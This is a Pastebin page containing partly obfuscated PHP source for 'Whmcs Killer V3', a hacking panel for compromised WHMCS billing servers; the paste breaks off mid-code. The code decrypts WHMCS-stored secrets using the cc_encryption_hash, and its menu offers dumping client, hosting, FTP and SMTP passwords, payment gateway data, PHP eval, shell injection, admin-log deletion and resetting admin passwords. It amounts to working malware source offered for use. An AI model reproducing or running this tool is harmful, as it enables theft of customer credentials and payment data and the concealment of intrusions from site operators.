API tools faq
paste
barkodas

Untitled

barkodas
Jan 15th, 2018
85
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.33 KB | None | 0 0
raw download clone embed print report diff
  1. <?php
  2. ${"GLOBALS"}["outicdmnc"] = "ii";
  3. ${"GLOBALS"}["utbtewtqar"] = "bg";
  4. ${"GLOBALS"}["rgwyiylp"] = "total_pages";
  5. ${"GLOBALS"}["yqutalc"] = "bg2";
  6. ${"GLOBALS"}["jqnmewjo"] = "num";
  7. ${"GLOBALS"}["kxrlsu"] = "col1";
  8. ${"GLOBALS"}["bqfsvypmmd"] = "sql";
  9. ${"GLOBALS"}["nhatbrs"] = "table";
  10. ${"GLOBALS"}["ihymmcbnbwl"] = "sql1";
  11. function login()
  12. {
  13. echo "<center><div id='content' class='box'><br><center><h3 class=\"tit\">DB configuration of WHMCS</h3><br></center><FORM action=\"\" method=\"post\" ><input type=\"hidden\" name=\"form_action\" value=\"1\"><br><table ><tr class='bg'><td>Database Host </td><td><input type=\"text\" size=\"60\" name=\"db_host\" value=\"" . $_COOKIE["db_host"] . "\"></td></tr><tr ><td>Database Username </td><td><input type=\"text\" size=\"60\" name=\"db_username\" value=\"" . $_COOKIE["db_username"] . "\"></td></tr><tr class='bg'><td>Database Password</td><td><input type=\"text\" size=\"60\" name=\"db_password\" value=\"" . $_COOKIE["db_password"] . "\"></td></tr><tr><td>Database Name</td><td><input type=\"text\" size=\"60\" name=\"db_name\" value=\"" . $_COOKIE["db_name"] . "\"></td></tr><tr class='bg'><td>cc_encryption_hash</td><td><input type=\"text\" size=\"60\" name=\"cc_encryption_hash\" value=\"" . $_COOKIE["cc_encryption_hash"] . "\"></td></tr></table<br><INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\"></FORM><h3 class=\"tit\">Symlink to configuration.php of WHMCS</h3><br><FORM action=\"\" method=\"post\"><input type=\"hidden\" name=\"form_action\" value=\"2\"><br> <table ><tr class='bg'><td><input type=\"text\" size=\"30\" name=\"file\" value=\"\"><br> </td><td><INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\"></td></tr></table></FORM>";
  14. if ($_COOKIE["login"] == "1") {
  15. $key = $_COOKIE["db_name"] . "-" . base64_encode(base64_encode($_COOKIE["db_host"]) . "|" . base64_encode($_COOKIE["db_username"]) . "|" . base64_encode($_COOKIE["db_password"]) . "|" . base64_encode($_COOKIE["db_name"]) . "|" . base64_encode($_COOKIE["cc_encryption_hash"]) . "|");
  16. echo "<p class='msg info'>Short info is <br><textarea cols=50 rows='4'>$key</textarea></p><br>";
  17. }
  18. echo "<h3 class=\"tit\">Short info</h3><FORM action=\"\" method=\"post\"><input type=\"hidden\" name=\"form_action\" value=\"3\"><br> <table ><tr class='bg'><td><input type=\"text\" size=\"60\" name='key' ></td><td></td><td><INPUT class=\"input-submit\" type=\"submit\" value=\"Submit\" name=\"Submit\"></td></tr></table></FORM></center></div><br>";
  19. echo "</div> <!-- /cols --><hr class=\"noscreen\" /><!-- Footer --><div id=\"footer\" class=\"box\"><p class=\"f-left\">Coded by <a href=\"http://www.rab3oun.net\">RAB3OUN</a>, </p><p class=\"f-right\">Templates by Adminizio</p></div> <!-- /footer --></div> <!-- /main --></body></html>";
  20. }
  21. ${"GLOBALS"}["xgolbbovnt"] = "title";
  22. ${"GLOBALS"}["tiozloyd"] = "create";
  23. ${"GLOBALS"}["vccjfiiqqv"] = "page";
  24. ${"GLOBALS"}["ejbqmv"] = "col";
  25. ${"GLOBALS"}["ixziiviuycx"] = "where";
  26. ${"GLOBALS"}["nptouqgsvo"] = "start_from";
  27. ${"GLOBALS"}["hdpvrycfg"] = "line";
  28. ${"GLOBALS"}["envupsjdgmq"] = "query";
  29. ${"GLOBALS"}["kzpczwgflxjo"] = "total_records";
  30. ${"GLOBALS"}["cmrxvpt"] = "k";
  31. ${"GLOBALS"}["plkahzbtei"] = "x";
  32. ${"GLOBALS"}["jshmnvixsqk"] = "value";
  33. ${"GLOBALS"}["kwxopsllwn"] = "q";
  34. ${"GLOBALS"}["jftdiqsydd"] = "where2";
  35.  
  36. function decrypt($string, $cc_encryption_hash)
  37. {
  38. $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
  39. $hash_key = _hash($key);
  40. $hash_length = strlen($hash_key);
  41. $string = base64_decode($string);
  42. $tmp_iv = substr($string, 0, $hash_length);
  43. $string = substr($string, $hash_length, strlen($string) - $hash_length);
  44. $iv = $out = "";
  45. $c = 0;
  46. while ($c < $hash_length) {
  47. $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
  48. ++$c;
  49. }
  50. $key = $iv;
  51. $c = 0;
  52. while ($c < strlen($string)) {
  53. if (($c != 0 AND $c % $hash_length == 0)) {
  54. $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
  55. }
  56. $out .= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
  57. ++$c;
  58. }
  59. return $out;
  60. }
  61. ${"GLOBALS"}["ieqlmszh"] = "db";
  62. ${"GLOBALS"}["lrhfsm"] = "head";
  63.  
  64. function _hash($string)
  65. {
  66. if (function_exists("sha1")) {
  67. $hash = sha1($string);
  68. } else {
  69. $hash = md5($string);
  70. }
  71. $out = "";
  72. $c = 0;
  73. while ($c < strlen($hash)) {
  74. $out .= chr(hexdec($hash[$c] . $hash[$c + 1]));
  75. $c += 2;
  76. }
  77. return $out;
  78. }
  79. ${"GLOBALS"}["tbjbrlvq"] = "item";
  80. ${"GLOBALS"}["qhvkuofdkk"] = "columns";
  81. function randomt()
  82. {
  83. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
  84. srand((double) microtime() * 1000000);
  85. $i = 0;
  86. $pass = "";
  87. while ($i <= 7) {
  88. $num = rand() % 33;
  89. $tmp = substr($chars, $num, 1);
  90. $pass = $pass . $tmp;
  91. $i++;
  92. }
  93. return $pass;
  94. }
  95. ${"GLOBALS"}["bwjpbyzycqo"] = "r";
  96. ${"GLOBALS"}["wmumpttm"] = "fp";
  97. function header2()
  98. {
  99. global $currentFile;
  100. echo "<html><title>Whmcs Killer V3 (Coded by RAB3OUN)</title><head>";
  101. echo "<link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=1\" /> <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=5\" /> <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=4\" title=\"2col\" /><link rel=\"alternate stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=3\" title=\"1col\" /> <link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=2\" /> ";
  102. echo "<style>#content {border:1px solid #afafaf; background:#fff;width:650;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /></head><body ><center><img src='?img=0'></center>";
  103. }
  104. ${"GLOBALS"}["pcpbwvmdq"] = "v";
  105. ${"GLOBALS"}["bftufbeb"] = "qq";
  106. function header1()
  107. {
  108. global $currentFile;
  109. @$query0 = mysql_query("SELECT value FROM tblconfiguration where setting='Charset' or setting='charset'");
  110. @$v0 = mysql_fetch_array($query0);
  111. $charset = $v0["value"] ? $v0["value"] : "utf-8";
  112. echo "<?xml version=\"1.0\"?><!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"><html xmlns=\"http://www.w3.org/1999/xhtml\" xml:lang=\"en\" lang=\"en\"><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=" . $charset . "\" /><meta http-equiv=\"content-language\" content=\"en\" /><meta name=\"robots\" content=\"noindex,nofollow\" /><link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=1\" /> <!-- RESET --><link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=5\" /> <!-- MAIN STYLE SHEET --><link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=4\" title=\"2col\" /> <!-- DEFAULT: 2 COLUMNS --><link rel=\"alternate stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=3\" title=\"1col\" /> <!-- ALTERNATE: 1 COLUMN --><link rel=\"stylesheet\" media=\"screen,projection\" type=\"text/css\" href=\"" . $currentFile . "?css=2\" /> <!-- GRAPHIC THEME --> <title>Whmcs Killer V3 (Coded by RAB3OUN)</title></head><body><div id=\"main\"><?<!-- Tray --><div id=\"tray\" class=\"box\"><p class=\"f-left box\"> <strong>WHMCS KILLER V3 </strong></p><p class=\"f-right\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <strong><a href=\"?p=9\" id=\"logout\">Log out</a></strong></p></div> <!-- /tray --><hr class=\"noscreen\" /><center><img src=\"?img=0\"></center><hr class=\"noscreen\" /><!-- Columns --><div id=\"cols\" class=\"box\"><!-- Aside (Left Column) --><div id=\"aside\" class=\"box\"><div class=\"padding box\"></div> <!-- /padding --><ul class=\"box\">";
  113. $menu = array(
  114. "h" => "Home",
  115. "102" => "Info",
  116. "1" => "H0st r00ts",
  117. "2" => "Domains Resellers",
  118. "3" => "Clients r00ts",
  119. "4" => "Clients Hosting Accounts",
  120. "63" => "Clients Tickets ",
  121. "100" => "Clients List ",
  122. "105" => "Clients Password",
  123. "7" => "FTP and SMTP password",
  124. "8" => "Tools",
  125. "101" => "Eval PHP",
  126. "99\" target=\"blank\"=>\"SQL",
  127. "11" => "BackUp",
  128. "106" => "DailyEmailBackup",
  129. "108" => "1nj3c7 Sh311",
  130. "109" => "Payment Gateways",
  131. "111" => "Addon Modules",
  132. "107" => "Index",
  133. "112" => "Custom Fields"
  134. );
  135. if ($_COOKIE["login"] <> "1")
  136. $menu = array(
  137. "c1" => "Db Config",
  138. "c2" => "Symlink to configuration.php of WHMCS",
  139. "c3" => "Short info"
  140. );
  141. foreach ($menu as $x => $y) {
  142. if ($_GET["p"] == $x) {
  143. echo ("<li id='submenu-active'><a href=\"?p=$x\"> $y</a>");
  144. } else {
  145. echo ("<li ><a href=\"?p=$x\" > $y</a>");
  146. }
  147. if (($x == 8)) {
  148. echo "<ul>";
  149. echo "<li><a href=\"?p=8&page=1\" > Upload</a></li> <li><a href=\"?p=8&page=2\" >Delete Adminlog </a></li><li><a href=\"?p=8&page=3\" >Change Admin Password to 123456</a></li><li><a href=\"?p=8&page=4\" >Change Client Password to 123456</a></li><li><a href=\"?p=8&page=5\" >Change Client Mail </a></li><li><a href=\"?p=8&page=6\" >Decrypt Password</a></li>";
  150. echo "</ul>";
  151. echo "</li>";
  152. } else {
  153. echo "</li>";
  154. }
  155. }
  156. echo "</ul></div> <!-- /aside --><hr class=\"noscreen\" /><!-- Content (Right Column) --><div id=\"content\" class=\"box\">";
  157. }
  158. function actionSql()
  159. {
  160. $_POST["p2"] = stripslashes($_POST["p2"]);
  161. ${"GLOBALS"}["dsvjvi"] = "tmp";
  162. echo "<script> var c_ = '" . htmlspecialchars($GLOBALS["cwd"]) . "'; var a_ = '" . htmlspecialchars(@$_POST["a"]) . "' var charset_ = '" . htmlspecialchars(@$_POST["charset"]) . "'; var p1_ = '" . ((strpos(@$_POST["p1"], "") !== false) ? "" : htmlspecialchars($_POST["p1"], ENT_QUOTES)) . "'; var p2_ = '" . ((strpos(@$_POST["p2"], "") !== false) ? "" : htmlspecialchars($_POST["p2"], ENT_QUOTES)) . "'; var p3_ = '" . ((strpos(@$_POST["p3"], "") !== false) ? "" : htmlspecialchars($_POST["p3"], ENT_QUOTES)) . "'; var d = document;function set(a,c,p1,p2,p3,charset) {if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;}function g(a,c,p1,p2,p3,charset) {set(a,c,p1,p2,p3,charset);d.mf.submit();}function a(a,c,p1,p2,p3,charset) {set(a,c,p1,p2,p3,charset);var params = 'ajax=true';for(i=0;i<d.mf.elements.length;i++)params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);sr('" . addslashes($_SERVER["REQUEST_URI"]) . "', params);}function sr(url, params) {if (window.XMLHttpRequest)req = new XMLHttpRequest();else if (window.ActiveXObject)req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); }}function processReqChange() {if( (req.readyState == 4) )if(req.status == 200) {var reg = new RegExp(\"(\\\d+)([\\\S\\\\s]*)\", 'm');var arr=reg.exec(req.responseText);eval(arr[2].substr(0, arr[1]));} else alert('Request error!');}</script><html><title>Whmcs Killer V3 (Coded by RAB3OUN)</title><head><style>body{background: #0f0e0d;color: #FF9933;padding: 0px;}a:link, body_alink{color: #FF9933;text-decoration: none;}a:visited, body_avisited{color: #FF9933;text-decoration: none;}a:hover, a:active, body_ahover{color: #FFFFFF;text-decoration: none;}th:hover{background: #524f46;text-decoration: none;}td, th, p, li,table{background: #2e2b28;border:1px solid #524f46;}input{border: 1px solid;cursor: default;overflow: hidden;background: #2e2b28;color: #ffffff;}</style><head><body><div style='position:absolute;width:100%;top:0;left:0;'><form method=post name=mf style='display:none;'><input type=hidden name=a><input type=hidden name=c><input type=hidden name=p1><input type=hidden name=p2><input type=hidden name=p3><input type=hidden name=charset></form>";
  163. class DbClass
  164. {
  165. var $type;
  166. var $link;
  167. var $res;
  168. function DbClass($type)
  169. {
  170. $this->type = $type;
  171. }
  172. function connect($host, $user, $pass, $dbname)
  173. {
  174. switch ($this->type) {
  175. case "mysql":
  176. if ($this->link = @mysql_connect($host, $user, $pass, true))
  177. return true;
  178. break;
  179. case "pgsql":
  180. $host = explode(":", $host);
  181. if (!$host[1])
  182. $host[1] = 5432;
  183. if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname"))
  184. return true;
  185. break;
  186. //================================ PAYMENT ==================================
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!